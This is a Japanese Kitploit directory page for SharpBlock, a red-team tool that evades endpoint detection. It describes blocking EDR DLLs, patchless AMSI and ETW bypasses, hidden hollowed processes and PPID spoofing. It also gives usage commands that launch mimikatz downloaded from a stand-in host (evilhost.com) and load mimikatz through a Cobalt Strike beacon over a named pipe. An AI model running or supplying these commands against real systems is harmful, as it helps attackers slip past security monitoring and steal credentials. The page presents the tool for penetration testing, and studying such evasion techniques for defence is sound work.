Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SharpBlock — EDRのアクティブプロジェクションDLLをバイパスする方法として、エントリポイントの実行を防止する手法。 | Kitploit
ツール/GitHubGitHub/ccob/sharpblock
レッドチーミング
GitHubccob/sharpblock

SharpBlock

EDRのアクティブプロジェクションDLLをバイパスする方法として、エントリポイントの実行を防止する手法。

リポジトリを見る
1.2k1655年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SharpBlock

エントリポイントの実行を防ぐことで、EDRのアクティブプロジェクションDLLをバイパスする方法。

特徴

  • EDR DLLのエントリポイント実行をブロックし、EDRフックが配置されるのを防ぎます。
  • ランタイムでAmsi.dllのコードパッチを検出するスキャナーから検出されない、パッチレスのAMSIバイパス。
  • ディスク、HTTP、または名前付きパイプ(Cobalt Strike)からロード可能なインプラントPEに置き換えられるホストプロセス。
  • インプラントプロセスは非表示になり、プロセス空洞化を検出するスキャナーを回避するのに役立ちます。
  • コマンドライン引数は偽装され、ステルスなEDR検出方法を使用してプロセス作成後に埋め込まれます。
  • パッチレスのETWバイパス。
  • 呼び出し先がブロックされたDLLのアドレス空間の範囲内にある場合、NtProtectVirtualMemoryの呼び出しをブロックします。
root@kitploit:~
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

例

ホストプロセスとしてnotepadを使用し、SylantStrikeのDLLをブロックしながら、HTTP経由でmimikatzを起動

root@kitploit:~
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

ホストプロセスとしてnotepadを使用し、SylantStrikeのDLLをブロックしながら、名前付きパイプ経由でCobalt Strikeビーコンを使用してmimikatzを起動

root@kitploit:~
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

注: upload_fileビーコンコマンドを使用するには、upload.cnaをCobalt Strikeのスクリプトマネージャーにロードしてください。

関連ブログ記事:

  • https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/
  • https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/
  • https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
ツールをダウンロード